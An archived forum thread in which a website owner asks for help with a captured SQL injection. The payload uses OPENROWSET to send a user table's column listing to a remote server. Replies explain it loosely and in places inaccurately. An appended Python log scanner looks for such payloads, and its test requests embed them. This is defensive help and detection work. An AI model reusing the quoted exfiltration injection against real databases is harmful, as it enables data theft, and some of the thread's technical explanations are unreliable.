Friday, March 30, 2012

Please help me figure out this sql injection...possible hack to my database.

INSERT INTO OPENROWSET ('SQLOLEDB','UID=as); PWD=; NETWORK=DBMSSOCN; ADDRESS=111.22.333.44; 1433; '; 'SELECT * FROM SQUARE.._columns') SELECT * FROM .INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='tbl_users' ORDER BY ORDINAL_POSITION; --sp_useradmin

I found this SQL that was attempted to be run via SQL injection due to a vulnerability on one of my pages on my company website. After doing some research I recognize that they seem to be trying to dump data into a remote SQL server... I am not sure what all of this means though. Can anyone help me understand what all of it means? I have a good understanding of SQL but I am certainly not an expert. Any replies would be greatly appreciated. I do understand how SQL injection works but I am not sure if this statement would even run.

1433: SQL Server TCP/IP port. I keep telling people not to use it to access SQL Server; in all my 8 years I have not had reason to use it.

NETWORK=DBMSSOCN: dbmssocn - Win32 Winsock TCP/IP

INSERT INTO OPENROWSET: Used to connect to other database systems like Oracle, IBM, but also used by Access and Excel

INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME: ANSI SQL defined system catalog for inter database system communication.

I don't think it can dump data into SQL Server; it can only do it if the person creating the database is not skilled. The first two can harm you; the latter OPENROWSET requires permissions to run, and the schema is not useful if you don't know the internal structure of the database in question. The main thing is the person doing it is not skilled or knowledgeable about databases. Post again if you still have questions. Hope this helps.

|||

Thanks for your answer. The person who eventually ran this query via SQL injection did know all of my table names by performing a query against one of the system tables.
I really need help here from anyone who is very knowledgeable with these types of attacks. If someone can point me in the right direction I would greatly appreciate it.

|||

(INSERT INTO OPENROWSET ('SQLOLEDB','UID=as); PWD=;

Will not run without a valid password)

(NETWORK=DBMSSOCN

ADDRESS=111.22.333.44; 1433

Connection through sockets could be dangerous)

('; 'SELECT * FROM SQUARE.._columns') SELECT * FROM .INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='tbl_users' ORDER BY ORDINAL_POSITION; --sp_useradmin)


These are not related to system tables. If they attacked you through system tables, you have not posted that code here. However, try the links below for some info about injections and how to prevent them. Hope this helps.

http://weblogs.asp.net/scottgu/archive/2006/09/30/Tip_2F00_Trick_3A00_-Guard-Against-SQL-Injection-Attacks.aspx

http://forums.asp.net/2/1423664/ShowThread.aspx#1423664
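
The keywords in the statement quoted in this thread (OPENROWSET, SQLOLEDB, ADDRESS=, INFORMATION_SCHEMA) are distinctive enough to search web-server logs for, which helps establish which page and parameter were hit and which remote host the data was addressed to. The following is an added example, not part of the original thread or the linked articles; the log line format, client addresses and page names are assumptions made for the demonstration.

```python
import re
from urllib.parse import parse_qsl, quote_plus, unquote_plus, urlsplit

# Tokens taken from the statement quoted in this thread.
INDICATORS = {
    "openrowset": re.compile(r"\bopenrowset\s*\(", re.I),
    "oledb_provider": re.compile(r"\bsqloledb\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\s*\.\s*(columns|tables)\b", re.I),
    "remote_address": re.compile(r"\baddress\s*=\s*([0-9a-z.\-]+)", re.I),
}

def decode(value, rounds=3):
    """URL-decode repeatedly so double-encoded values are still matched."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_request(line):
    """Scan one log line in the assumed format '<client_ip> <METHOD> <url>'.
    Returns a list of (client_ip, parameter, indicator_names, remote_host)."""
    client, _method, url = line.split(" ", 2)
    findings = []
    # parse_qsl already decodes once; decode() peels any further layers.
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        text = decode(value)
        hits = sorted(k for k, rx in INDICATORS.items() if rx.search(text))
        if hits:
            addr = INDICATORS["remote_address"].search(text)
            findings.append((client, name, hits, addr.group(1) if addr else None))
    return findings

def scan_log(lines):
    return [finding for line in lines for finding in scan_request(line)]

# Constructed sample: the statement as quoted in the thread, URL-encoded into
# made-up requests. Client addresses and page names are invented for the demo.
QUOTED = ("INSERT INTO OPENROWSET ('SQLOLEDB','UID=as); PWD=; NETWORK=DBMSSOCN; "
          "ADDRESS=111.22.333.44; 1433; '; 'SELECT * FROM SQUARE.._columns') "
          "SELECT * FROM .INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='tbl_users'")
SAMPLE_LOG = [
    "198.51.100.7 GET /products.aspx?id=42",
    "198.51.100.9 GET /products.aspx?id=1" + quote_plus(";" + QUOTED),
    "198.51.100.7 GET /search.aspx?q=open+row+seats",
    "198.51.100.4 GET /products.aspx?id=1" + quote_plus(quote_plus(";" + QUOTED)),
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A hit only shows that the statement reached the web server; whether it ran depends on the database permissions discussed in the replies above.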
